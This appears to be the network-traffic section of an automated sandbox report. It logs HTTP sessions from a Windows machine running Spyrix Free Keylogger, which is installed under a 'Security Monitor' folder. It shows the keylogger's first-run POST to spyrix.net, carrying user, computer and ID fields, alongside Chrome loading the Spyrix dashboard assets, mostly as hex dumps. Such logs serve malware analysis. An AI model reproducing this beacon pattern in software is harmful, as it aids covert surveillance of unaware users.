                                                                                                                                                                                                                                                          2024-10-02 04:28:25 UTC4096INData Raw: a2 45 de 2b 44 9d 6a 3d 14 00 84 06 42 6f 38 a8 2a ff 21 6c 41 cf dc 7c 44 8e c3 4e 49 c4 b4 fe 7c 43 00 69 5a b6 cf e5 a3 87 df fc 95 d5 b6 69 81 af e9 90 2a 18 29 18 ba 4d ee 34 a7 ea 88 0e e8 5e e9 22 d6 25 85 f5 19 cb c0 46 b8 ff a3 bf 03 5f 87 80 35 d8 8c 6d 2e ff 81 1a 24 c9 31 c0 63 86 4f 3e e7 0a 68 70 2f d1 f9 99 54 f4 e5 3c 89 41 2c 45 47 ad 4c 26 12 8c 9c 16 59 4c fe 58 cb af 15 08 b1 0f 48 a1 46 e9 00 0c 22 a0 15 0e 51 a7 7e 87 e1 79 11 9e e2 cb 90 f6 d6 ba f1 f8 08 ba 49 d4 8f 57 ec 37 af d8 df 10 8e bc a6 0f f7 a4 13 0f 03 54 46 d9 39 e5 7d ac 3c cc 16 0c 8c 82 1d f8 73 c7 93 67 70 5d 05 14 13 bf ab 71 29 4b c0 6c bb ca e1 88 1e cd ea 5a da b6 28 be a3 81 72 d4 9b a9 fc 4c f4 16 5e cb 92 3c 62 44 0c f2 42 50 17 92 5e 57 37 fe af e2 90 43 ce
                                                                                                                                                                                                                                                          Data Ascii: E+Dj=Bo8*!lA|DNI|CiZi*)M4^"%F_5m.$1cO>hp/T<A,EGL&YLXHF"Q~yIW7TF9}<sgp]q)KlZ(rL^<bDBP^W7C
                                                                                                                                                                                                                                                          2024-10-02 04:28:25 UTC4096INData Raw: 09 62 52 3b 66 45 bb dd d4 ce c0 b2 d6 1d 53 b1 36 2f bc 0d 5b 91 14 38 9c 06 58 61 18 ae e0 c3 15 b1 8b 74 e6 e2 cf 51 b4 33 68 47 39 87 97 56 3a 46 87 83 fc 50 fa 6d e7 6d fd c3 56 42 69 ba 1b 45 2a b4 51 f0 b1 d5 a7 ec 59 64 02 8e 2e 69 58 3d 63 c5 8c f3 83 ad 99 8e 86 8b 26 8a 96 fb 0f aa 22 e8 42 c5 22 d4 c6 46 49 bc b1 32 89 30 02 05 83 90 0e 2c 88 21 8b 9e 19 58 de 51 20 7e dd 9a e4 f6 44 76 e7 4b df 50 9d e9 fa 37 5c 40 42 44 89 e1 3f fa 12 ca 69 02 9b a4 5b 5a e0 c6 85 a4 20 0b 04 4c ed 1c ef e5 6a 14 a1 42 52 36 43 40 c6 8c 62 a8 68 e7 8b 76 e4 01 9e ce a0 dd 7e 98 66 83 55 8f ec e0 48 1e d9 af 39 e5 70 b2 02 bf 19 f9 f8 b9 04 32 d4 95 44 79 df bf bf 2f cf 1b 01 f1 95 68 46 7c a0 d0 21 4e 21 bb ba 88 db 8c c6 e0 60 78 3a 98 10 ee 41 21 e4 38 4f
                                                                                                                                                                                                                                                          Data Ascii: bR;fES6/[8XatQ3hG9V:FPmmVBiE*QYd.iX=c&"B"FI20,!XQ ~DvKP7\@BD?i[Z LjBR6C@bhv~fUH9p2Dy/hF|!N!`x:A!8O


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          14192.168.2.755022158.69.117.1194436208C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:28:26 UTC166OUTPOST /dashboard/prg-actions HTTP/1.1
                                                                                                                                                                                                                                                          Host: spyrix.net
                                                                                                                                                                                                                                                          User-Agent: curl/7.64.0
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Content-Length: 416
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          2024-10-02 04:28:26 UTC416OUTData Raw: 26 61 63 74 69 6f 6e 3d 61 70 70 3a 52 75 6e 3a 46 69 72 73 74 26 64 61 74 61 3d 26 70 72 67 5f 69 64 3d 53 70 79 72 69 78 20 46 72 65 65 20 4b 65 79 6c 6f 67 67 65 72 26 70 72 67 5f 76 65 72 3d 31 31 2e 36 2e 32 32 26 75 73 65 72 5f 6e 61 6d 65 3d 66 72 6f 6e 74 64 65 73 6b 26 75 73 65 72 3d 26 63 6f 6d 70 5f 6e 61 6d 65 3d 33 37 37 31 34 32 26 63 6f 6d 70 5f 69 64 3d 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 5f 32 34 31 30 30 32 30 31 35 36 32 35 26 63 6f 6d 70 5f 74 69 6d 65 3d 32 30 32 34 2d 31 30 2d 30 32 20 30 31 3a 35 38 3a 34 32 2e 31 34 33 26 70 72 67 5f 6c 6e 67 3d 65 6e 67 6c 69 73 68 26 6f 73 5f 63 61 70 74 69 6f 6e 3d 20 28 29 26 6f 73 5f 74 79 70 65 3d 77 69 6e 64 6f 77 73 26
                                                                                                                                                                                                                                                          Data Ascii: &action=app:Run:First&data=&prg_id=Spyrix Free Keylogger&prg_ver=11.6.22&user_name=user&user=&comp_name=377142&comp_id=9e146be9-c76a-4720-bcdb-53011b87bd06_241002015625&comp_time=2024-10-02 01:58:42.143&prg_lng=english&os_caption= ()&os_type=windows&
                                                                                                                                                                                                                                                          2024-10-02 04:28:26 UTC170INHTTP/1.1 201 Created
                                                                                                                                                                                                                                                          Server: nginx/1.17.3
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:28:26 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          2024-10-02 04:28:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          15192.168.2.755021158.69.117.1194434240C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:28:26 UTC596OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                                                                          Host: dashboard.spyrix.com
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                          Referer: https://dashboard.spyrix.com/
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-10-02 04:28:26 UTC320INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.17.3
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:28:26 GMT
                                                                                                                                                                                                                                                          Content-Type: image/x-icon
                                                                                                                                                                                                                                                          Content-Length: 3029
                                                                                                                                                                                                                                                          Last-Modified: Thu, 01 Feb 2024 09:41:29 GMT
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          ETag: "65bb6749-bd5"
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000;
                                                                                                                                                                                                                                                          X-State: 3.0
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          2024-10-02 04:28:26 UTC3029INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 b8 00 00 00 b8 08 06 00 00 00 50 33 26 c7 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 21 37 00 00 21 37 01 33 58 9f 7a 00 00 00 18 74 45 58 74 53 6f 66 74 77 61 72 65 00 70 61 69 6e 74 2e 6e 65 74 20 34 2e 31 2e 36 fd 4e 09 e8 00 00 0b 53 49 44 41 54 78 5e ed 9d ff 71 dc 46 12 85 15 82 43 b8 10 1c 82 43 b8 0c 4e 65 49 ae fb cf cc 40 ce 40 ce 60 c5 08 ec 0c 18 02 43 b8 10 18 02 6e 1a 9c 95 c6 d0 e3 6e 77 03 33 98 e9 79 5f d5 57 aa 6a 71 77 f1 e3 ed a0 31 00 c8 77 cb b2 b8 fd f5 b2 bc ff f8 75 59 28 ad 65 99 37 8f b0 a8 95 01 a7 b5 2d f3 e6 11 16 b5 32 e0 b4 b6 65 de 3c c2 a2 56 06 9c d6 b6 cc 9b 47 58 d4 ca 80 d3 da 96 79 f3 08 8b 5a 19 70 5a db 32 6f 1e 61 51 2b 03
                                                                                                                                                                                                                                                          Data Ascii: PNGIHDRP3&gAMAapHYs!7!73XztEXtSoftwarepaint.net 4.1.6NSIDATx^qFCCNeI@@`Cnnw3y_Wjqw1wuY(e7-2e<VGXyZpZ2oaQ+


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          16192.168.2.755023158.69.117.1194434240C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:28:26 UTC350OUTGET /cdn.js HTTP/1.1
                                                                                                                                                                                                                                                          Host: dashboard.spyrix.com
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-10-02 04:28:26 UTC344INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.17.3
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:28:26 GMT
                                                                                                                                                                                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                                          Content-Length: 987
                                                                                                                                                                                                                                                          Last-Modified: Mon, 30 Sep 2024 10:46:14 GMT
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          ETag: "66fa8176-3db"
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000;
                                                                                                                                                                                                                                                          X-State: 3.0
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          2024-10-02 04:28:26 UTC987INData Raw: 0a 63 6c 61 73 73 20 43 64 6e 20 7b 0a 20 20 5f 6d 61 78 43 6f 75 6e 74 65 72 20 3d 20 33 30 3b 0a 20 20 5f 69 6e 74 65 72 76 61 6c 20 3d 20 6e 75 6c 6c 3b 0a 20 20 5f 63 6f 75 6e 74 65 72 20 3d 20 30 3b 0a 0a 20 20 69 6e 69 74 28 29 20 7b 0a 20 20 20 20 2f 2f 20 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 27 63 64 6e 2d 6f 66 66 3d 30 27 3b 20 2f 2f d0 bf d0 be d1 82 d0 be d0 bc d1 83 20 d1 87 d1 82 d0 be 20 d0 ba d1 83 d0 ba d0 b0 20 d0 bf d0 b5 d1 80 d0 b5 d0 b1 d0 b8 d0 b2 d0 b0 d0 bb d0 b0 d1 81 d1 8c 20 d0 b8 20 d0 bd d0 b5 20 d0 bf d0 b5 d1 80 d0 b5 d0 b2 d0 be d0 b4 d0 b8 d0 bb d0 be 20 d0 bd d0 b0 20 d1 81 d0 b5 d1 80 d0 b2 d0 b5 d1 80 0a 20 20 20 20 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 20 3d 20 73 65 74 49 6e 74 65 72 76 61 6c 28
                                                                                                                                                                                                                                                          Data Ascii: class Cdn { _maxCounter = 30; _interval = null; _counter = 0; init() { // document.cookie = 'cdn-off=0'; // this._interval = setInterval(


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          17192.168.2.75502095.181.182.1824434240C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:28:26 UTC626OUTGET /dashboard30/assets/en-08b2a987.js HTTP/1.1
                                                                                                                                                                                                                                                          Host: cdn.cdndownload.net
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                          Origin: https://dashboard.spyrix.com
                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                          Referer: https://cdn.cdndownload.net/dashboard30/assets/index-004f4025.js
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-10-02 04:28:26 UTC402INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:28:26 GMT
                                                                                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Last-Modified: Mon, 30 Sep 2024 10:46:21 GMT
                                                                                                                                                                                                                                                          ETag: W/"66fa817d-69c5"
                                                                                                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://dashboard.spyrix.com
                                                                                                                                                                                                                                                          Cache: STALE
                                                                                                                                                                                                                                                          X-Cached-Since: 2024-10-02T03:12:50+00:00
                                                                                                                                                                                                                                                          X-Node: m9-up-gc73
                                                                                                                                                                                                                                                          2024-10-02 04:28:26 UTC3694INData Raw: 31 63 37 35 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 9d e9 6e dc 56 96 c7 bf cf 53 70 88 00 76 80 6b 61 d2 dd 98 1e b0 21 0c bc 24 8e 3b de e2 25 ee 04 03 a4 a9 2a 96 c4 36 8b ac 90 2c c9 4a 90 07 9a d7 98 27 9b df ff dc 7b 49 d6 22 c9 4b e2 76 3a fe 22 f1 ee db d9 cf b9 b7 66 4d dd f5 49 71 98 de 5c f7 cd aa ca cf 53 d7 1c a6 4f 8a bc 6b ea d4 f5 87 e9 9d a2 9b b5 e5 aa 2f 95 ce 0f d3 a7 7d de af bb d4 95 7c ce da a2 a8 bb 93 a6 4f 5d 7d 98 3e ea 4f 8a 36 75 dd 61 fa bc d3 47 4b a7 ab 55 45 8f 33 b2 ea 97 75 73 46 17 d5 61 7a ab 6d ce ac c6 fc 30 bd 5d 95 ab a3 26 6f e7 a9 5b 1f a6 2f 8a a3 59 be 4c dd ca c6 69 e9 f7 fc 30 fd fc 55 c9 c7 f2 30 fd a6 9c 17 4d 5b cc 52 77 42 79 b3 ae e7 96 38 f6 e3 94 b3 dc 4f 72 71 98 3e 2b fb aa 48 dd a9 fa 6f 3a be ce 0e
                                                                                                                                                                                                                                                          Data Ascii: 1c75nVSpvka!$;%*6,J'{I"Kv:"fMIq\SOk/}|O]}>O6uaGKUE3usFazm0]&o[/YLi0U0M[RwBy8Orq>+Ho:
                                                                                                                                                                                                                                                          2024-10-02 04:28:26 UTC3599INData Raw: e9 23 23 25 16 dc 99 78 fd da 0b 49 c5 ab 15 8e 31 bf 98 ab 2a 85 9e a6 5c 67 5f 27 17 96 bb b2 46 2c 22 10 75 80 d0 79 83 91 58 46 bf e2 15 26 1d e9 6c 11 38 b7 4b 84 4f 6c 41 41 44 1f e1 3d 79 ad 46 3e 10 69 3e 88 0b bd 82 12 c2 c6 36 f5 18 b7 f2 66 8d a4 f0 12 a9 89 98 a7 d0 98 ae 0b 01 86 7b 32 11 68 2c d0 3b 43 2c a9 cd ad bd e5 16 bf b4 78 6c fd 90 b5 8c e0 c1 26 c4 76 5b 05 66 be 5f 15 84 a0 87 30 07 f9 5b 8c 24 9b e9 48 4c 1a 0f c4 65 15 8c 2a a1 2b b2 93 d8 5e 16 72 d9 c8 d3 0e 6a fb 1e 7c 5c 47 d8 c2 68 73 7a 66 ea e5 1b 34 c1 b0 1d 6d 78 59 29 35 db 9b c4 46 25 4e 76 50 26 bb 3f 7f 4f fd 05 34 c7 02 03 77 5a 84 12 cc 3c 04 b9 d4 85 b3 a0 e6 0c 47 c3 a0 88 5e 85 37 c1 33 f1 0e 98 77 51 0f 90 1d f3 49 d0 b5 87 26 ed 73 0c f1 bb b0 c8 0e 39 c8 78
                                                                                                                                                                                                                                                          Data Ascii: ##%xI1*\g_'F,"uyXF&l8KOlAAD=yF>i>6f{2h,;C,xl&v[f_0[$HLe*+^rj|\Ghszf4mxY)5F%NvP&?O4wZ<G^73wQI&s9x
                                                                                                                                                                                                                                                          2024-10-02 04:28:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          18192.168.2.755026158.69.117.1194434240C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:28:26 UTC355OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                                                                          Host: dashboard.spyrix.com
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-10-02 04:28:27 UTC320INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.17.3
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:28:27 GMT
                                                                                                                                                                                                                                                          Content-Type: image/x-icon
                                                                                                                                                                                                                                                          Content-Length: 3029
                                                                                                                                                                                                                                                          Last-Modified: Thu, 01 Feb 2024 09:41:29 GMT
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          ETag: "65bb6749-bd5"
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000;
                                                                                                                                                                                                                                                          X-State: 3.0
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          2024-10-02 04:28:27 UTC3029INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 b8 00 00 00 b8 08 06 00 00 00 50 33 26 c7 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 21 37 00 00 21 37 01 33 58 9f 7a 00 00 00 18 74 45 58 74 53 6f 66 74 77 61 72 65 00 70 61 69 6e 74 2e 6e 65 74 20 34 2e 31 2e 36 fd 4e 09 e8 00 00 0b 53 49 44 41 54 78 5e ed 9d ff 71 dc 46 12 85 15 82 43 b8 10 1c 82 43 b8 0c 4e 65 49 ae fb cf cc 40 ce 40 ce 60 c5 08 ec 0c 18 02 43 b8 10 18 02 6e 1a 9c 95 c6 d0 e3 6e 77 03 33 98 e9 79 5f d5 57 aa 6a 71 77 f1 e3 ed a0 31 00 c8 77 cb b2 b8 fd f5 b2 bc ff f8 75 59 28 ad 65 99 37 8f b0 a8 95 01 a7 b5 2d f3 e6 11 16 b5 32 e0 b4 b6 65 de 3c c2 a2 56 06 9c d6 b6 cc 9b 47 58 d4 ca 80 d3 da 96 79 f3 08 8b 5a 19 70 5a db 32 6f 1e 61 51 2b 03
                                                                                                                                                                                                                                                          Data Ascii: PNGIHDRP3&gAMAapHYs!7!73XztEXtSoftwarepaint.net 4.1.6NSIDATx^qFCCNeI@@`Cnnw3y_Wjqw1wuY(e7-2e<VGXyZpZ2oaQ+


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          19192.168.2.75504095.181.182.1824434240C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:28:28 UTC586OUTGET /dashboard30/assets/ConfirmPhoneModal-86d79a8a.css HTTP/1.1
                                                                                                                                                                                                                                                          Host: cdn.cdndownload.net
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                          Referer: https://dashboard.spyrix.com/
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-10-02 04:28:28 UTC303INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:28:28 GMT
                                                                                                                                                                                                                                                          Content-Type: text/css
                                                                                                                                                                                                                                                          Content-Length: 2721
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Last-Modified: Mon, 30 Sep 2024 10:46:21 GMT
                                                                                                                                                                                                                                                          ETag: "66fa817d-aa1"
                                                                                                                                                                                                                                                          Cache: STALE
                                                                                                                                                                                                                                                          X-Cached-Since: 2024-10-01T22:13:48+00:00
                                                                                                                                                                                                                                                          X-Node: m9-up-gc71
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          2024-10-02 04:28:28 UTC2721INData Raw: 2e 46 52 51 4a 53 77 32 37 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 66 6c 65 78 3a 31 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 6d 61 78 2d 77 69 64 74 68 3a 33 35 30 70 78 3b 77 69 64 74 68 3a 31 30 30 25 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 34 38 30 70 78 29 7b 2e 46 52 51 4a 53 77 32 37 7b 6d 61 78 2d 77 69 64 74 68 3a 39 35 25 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 7d 2e 4e 72 48 54 51 32 4a 4e 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 76 61 72 28 2d 2d 73 68 61
                                                                                                                                                                                                                                                          Data Ascii: .FRQJSw27{display:flex;flex-direction:column;flex:1;justify-content:center;max-width:350px;width:100%}@media screen and (max-width: 480px){.FRQJSw27{max-width:95%;padding:15px}}.NrHTQ2JN{border-radius:10px;padding:30px;background:#fff;box-shadow:var(--sha


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          20192.168.2.75503895.181.182.1824434240C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:28:28 UTC575OUTGET /dashboard30/assets/Button-ca236c00.css HTTP/1.1
                                                                                                                                                                                                                                                          Host: cdn.cdndownload.net
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                          Referer: https://dashboard.spyrix.com/
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-10-02 04:28:28 UTC301INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:28:28 GMT
                                                                                                                                                                                                                                                          Content-Type: text/css
                                                                                                                                                                                                                                                          Content-Length: 2466
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Last-Modified: Mon, 30 Sep 2024 10:46:21 GMT
                                                                                                                                                                                                                                                          ETag: "66fa817d-9a2"
                                                                                                                                                                                                                                                          Cache: HIT
                                                                                                                                                                                                                                                          X-Cached-Since: 2024-10-02T04:13:37+00:00
                                                                                                                                                                                                                                                          X-Node: m9-up-gc82
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          2024-10-02 04:28:28 UTC2466INData Raw: 2e 67 31 6a 44 45 4e 75 51 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 2e 33 73 20 65 61 73 65 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 30 70 78 3b 2d 77 65 62 6b 69 74 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 3b 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 67 31 6a 44 45 4e 75 51 20 73 76 67 7b 74 72 61 6e 73 69 74 69 6f 6e 3a 2e 33 73 20 65 61 73 65 7d 2e 6b 6e 33 2d 6a 70 61 38 7b 6f 70 61 63 69 74 79 3a 2e 38 3b 63 75 72 73 6f 72 3a 70 72 6f 67 72 65 73 73 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 69 31 61 53 67 71 4e 7b 6f 70 61 63 69 74 79 3a 2e 34 3b 63
                                                                                                                                                                                                                                                          Data Ascii: .g1jDENuQ{display:flex;transition:.3s ease;border-radius:10px;-webkit-user-select:none;user-select:none;max-width:100%;text-align:center;cursor:pointer}.g1jDENuQ svg{transition:.3s ease}.kn3-jpa8{opacity:.8;cursor:progress!important}.pi1aSgqN{opacity:.4;c


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          21192.168.2.75503495.181.182.1824434240C:\Program Files\Google\Chrome\Application\chrome.exe
